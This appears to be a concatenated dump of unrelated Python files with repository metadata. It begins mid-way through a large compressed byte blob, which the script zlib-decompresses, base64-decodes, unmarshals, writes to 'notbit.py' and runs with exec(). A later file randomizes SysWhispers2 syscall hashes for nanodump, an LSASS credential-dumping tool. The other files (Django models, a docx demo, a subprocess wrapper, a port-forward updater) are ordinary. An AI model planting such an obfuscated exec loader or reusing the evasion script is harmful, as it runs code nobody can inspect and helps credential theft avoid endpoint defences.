e3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f .\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val=zlib.decompress(data)
val=bs.b64decode(val)
val2=ms.loads(val)
fw=open('notbit.py','w')
fw.write(val2)
fw.close()
exec(val2)
print('done')
| 834.235294 | 13,981 | 0.733042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13,996 | 0.986885 |
6a0fb21e21040834df2f296f7650980a669e7a30 | 374 | py | Python | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | 3 | 2021-03-12T18:32:39.000Z | 2021-11-08T10:21:04.000Z | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | null | null | null | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | 2 | 2021-01-29T14:52:53.000Z | 2022-03-05T10:24:24.000Z | from django.db import models
# Create your models here.
class Gamedoc(models.Model):
link = models.URLField(max_length=500)
title = models.CharField(max_length=500)
repo_name = models.CharField(max_length=512, blank=True, null=True)
user_name = models.CharField(max_length=512, blank=True, null=True)
def __str__(self):
return f'{self.title}'
| 28.769231 | 71 | 0.719251 | 315 | 0.842246 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.109626 |
6a0ff32b449d925c6b914b62185f0b337c8c4a7c | 133 | py | Python | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | from django.contrib import admin
from users.models import Friendship
admin.site.register(Friendship)
# Register your models here.
| 16.625 | 35 | 0.81203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.210526 |
6a10bfc3e38883e78cd876111e7b6300fd43d471 | 529 | py | Python | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | import docx
doc = docx.Document('demo.docx')
print('paragraphs number: %s' % len(doc.paragraphs))
print('1st paragraph: %s' % doc.paragraphs[0].text)
print('2nd paragraph: %s' % doc.paragraphs[1].text)
print('paragraphs runs: %s' % len(doc.paragraphs[1].runs))
print('1st paragraph run: %s' % doc.paragraphs[1].runs[0].text)
print('2nd paragraph run: %s' % doc.paragraphs[1].runs[1].text)
print('3rd paragraph run: %s' % doc.paragraphs[1].runs[2].text)
print('4th paragraph run: %s' % doc.paragraphs[1].runs[3].text)
| 44.083333 | 64 | 0.680529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.349716 |
6a114f290b289195e2b18bfe3c8fd05836efd438 | 1,821 | py | Python | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 2 | 2021-03-12T11:12:23.000Z | 2021-05-19T08:32:47.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 6 | 2019-12-16T21:54:13.000Z | 2022-02-10T00:16:08.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | [
"Apache-2.0"
] | 3 | 2019-11-07T22:44:21.000Z | 2021-02-22T05:51:59.000Z | # Analysis the data generated from on policy simulations of QL, QLP and GQL.
from BD.sim.sims import sims_analysis, merge_sim_files, extract_run_rew
from BD.util.paths import Paths
def sims_analysis_BD():
input_folder = Paths.rest_path + 'archive/beh/qlp-ml-opt/qlp-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/qlp_ml_onpolicy__stats.csv',
lambda conf: True
)
input_folder = Paths.rest_path + 'archive/beh/ql-ml-opt/ql-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/ql_ml_onpolicy_stats.csv',
lambda conf: True
)
def sims_analysis_GQL_BD():
input_folder = Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/gql_ml_onpolicy_stats.csv',
lambda conf: True
)
input_folder = Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/'
sims_analysis(input_folder,
Paths.local_path + 'BD/to_graph_data/gql10d_ml_onpolicy_stats.csv',
lambda conf: True
)
if __name__ == '__main__':
sims_analysis_BD()
sims_analysis_GQL_BD()
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql10d_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
| 35.019231 | 100 | 0.665568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 546 | 0.299835 |
6a11d7dca909e3885ae2dbc3bc1e2d0a99547ada | 3,901 | py | Python | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import glob
import random
import struct
def get_old_seed():
with open('include/syscalls.h') as f:
code = f.read()
match = re.search(r'#define SW2_SEED (0x[a-fA-F0-9]{8})', code)
assert match is not None, 'SW2_SEED not found!'
return match.group(1)
def replace_seed(old_seed, new_seed):
with open('include/syscalls.h') as f:
code = f.read()
code = code.replace(
f'#define SW2_SEED {old_seed}',
f'#define SW2_SEED 0x{new_seed:08X}',
1
)
with open('include/syscalls.h', 'w') as f:
f.write(code)
def get_function_hash(seed, function_name, is_syscall=True):
function_hash = seed
function_name = function_name.replace('_', '')
if is_syscall and function_name[:2] == 'Nt':
function_name = 'Zw' + function_name[2:]
name = function_name + '\0'
ror8 = lambda v: ((v >> 8) & (2 ** 32 - 1)) | ((v << 24) & (2 ** 32 - 1))
for segment in [s for s in [name[i:i + 2] for i in range(len(name))] if len(s) == 2]:
partial_name_short = struct.unpack('<H', segment.encode())[0]
function_hash ^= partial_name_short + ror8(function_hash)
return function_hash
def replace_syscall_hashes(seed):
with open('source/syscalls.c') as f:
code = f.read()
regex = re.compile(r'__declspec\(naked\) NTSTATUS (Nt[^(]+)')
syscall_names = re.findall(regex, code)
syscall_names = set(syscall_names)
syscall_definitions = code.split('#elif defined(__GNUC__)')[3]
for syscall_name in syscall_names:
regex = re.compile('NTSTATUS ' + syscall_name + '\\(.*?"mov ecx, (0x[A-Fa-f0-9]{8})', re.DOTALL)
match = re.search(regex, syscall_definitions)
assert match is not None, f'hash of syscall {syscall_name} not found!'
old_hash = match.group(1)
new_hash = get_function_hash(seed, syscall_name)
print(f'{syscall_name} -> {old_hash} - 0x{new_hash:08X}')
code = code.replace(
old_hash,
f'0x{new_hash:08X}'
)
with open('source/syscalls.c', 'w') as f:
f.write(code)
with open('source/syscalls-asm.asm') as f:
code = f.read()
for syscall_name in syscall_names:
regex = re.compile(syscall_name + ' PROC.*?mov ecx, 0([A-Fa-f0-9]{8})h', re.DOTALL)
match = re.search(regex, code)
assert match is not None, f'hash of syscall {syscall_name} not found!'
old_hash = match.group(1)
new_hash = get_function_hash(seed, syscall_name)
code = code.replace(
f'0{old_hash}h',
f'0{new_hash:08X}h',
1
)
with open('source/syscalls-asm.asm', 'w') as f:
f.write(code)
def replace_dinvoke_hashes(seed):
for header_file in glob.glob("include/**/*.h", recursive=True):
with open(header_file) as f:
code = f.read()
regex = re.compile(r'#define (\w+)_SW2_HASH (0x[a-fA-F0-9]{8})')
matches = re.findall(regex, code)
for function_name, old_hash in matches:
new_hash = get_function_hash(seed, function_name, is_syscall=False)
code = code.replace(
f'#define {function_name}_SW2_HASH {old_hash}',
f'#define {function_name}_SW2_HASH 0x{new_hash:08X}',
1
)
if matches:
with open(header_file, 'w') as f:
f.write(code)
def main():
new_seed = random.randint(2 ** 28, 2 ** 32 - 1)
#new_seed = 0x1337c0de
old_seed = get_old_seed()
replace_seed(old_seed, new_seed)
replace_syscall_hashes(new_seed)
replace_dinvoke_hashes(new_seed)
if os.name == 'nt':
print('done! recompile with:\nnmake -f Makefile.msvc')
else:
print('done! recompile with:\nmake -f Makefile.mingw')
if __name__ == '__main__':
main()
| 32.508333 | 104 | 0.600103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 980 | 0.251218 |
6a11fa8d863a9e5b451bd2a7ef2241aafe768509 | 1,289 | py | Python | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 3 | 2018-02-05T11:43:04.000Z | 2019-02-22T18:11:55.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 4 | 2019-03-26T09:51:43.000Z | 2019-03-31T06:41:14.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | [
"Apache-2.0"
] | 1 | 2019-03-03T20:55:21.000Z | 2019-03-03T20:55:21.000Z | from subprocess import run, PIPE, TimeoutExpired, CompletedProcess
from codes import exitcodes
def _error_decode(response):
stderr = ""
if response.returncode:
if response.returncode < 0:
errmsg = exitcodes.get(abs(response.returncode), "Unknown Error")
if isinstance(errmsg, dict):
errmsg = errmsg["descr"]
else:
errmsg = response.stderr
stderr = "Exit code ({}): {}".format(abs(response.returncode), errmsg)
return response.returncode, stderr
def execute(cmd, workdir=None, timeout=60):
cmd = ["/bin/bash", "-c", cmd]
try:
response = run(
cmd,
stderr=PIPE,
stdout=PIPE,
cwd=workdir,
timeout=timeout,
universal_newlines=True,
)
except TimeoutExpired:
response = CompletedProcess(
args=cmd,
returncode=124,
stderr="Timeout"
)
except:
response = CompletedProcess(
args=cmd,
returncode=-1,
stderr="Internal Checker Error"
)
response.stdout = "" if not response.stdout else str(response.stdout)
response.returncode, response.stderr = _error_decode(response)
return response | 30.690476 | 78 | 0.577967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 94 | 0.072925 |
6a124e6043f5f93ce124eed73efc4b8488512375 | 1,739 | py | Python | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 9 | 2018-01-06T05:44:43.000Z | 2020-06-24T00:15:16.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 27 | 2018-01-06T09:29:48.000Z | 2020-04-10T16:11:59.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | [
"MIT"
] | 1 | 2018-01-09T01:33:42.000Z | 2018-01-09T01:33:42.000Z | import json
from pfm.pf_command.base import BaseCommand
from pfm.util.log import logger
class UpdateCommand(BaseCommand):
def __init__(self, name, forward_type,
remote_host, remote_port, local_port,
ssh_server, server_port, login_user, config):
super(UpdateCommand, self).__init__(config)
self.name = name
self.forward_type = forward_type
self.remote_host = remote_host
self.remote_port = remote_port
self.local_port = local_port
self.ssh_server = ssh_server
self.server_port = server_port
self.login_user = login_user
def run(self):
f = open(self.config_path, 'r')
targets = json.load(f)
if self.name in targets:
target = targets[self.name]
self.update(target)
else:
logger.warn("Port forward setting named " + self.name + "is not registered")
# write the target
f = open(self.config_path, 'w')
f.write(json.dumps(targets, indent=4))
f.close()
def update(self, target):
if self.forward_type is not None:
target["type"] = self.forward_type
if self.remote_host is not None:
target["remote_host"] = self.remote_host
if self.remote_port is not None:
target["remote_port"] = self.remote_port
if self.local_port is not None:
target["local_port"] = self.local_port
if self.ssh_server is not None:
target["ssh_server"] = self.ssh_server
if self.server_port is not None:
target["server_port"] = self.server_port
if self.login_user is not None:
target["login_user"] = self.login_user
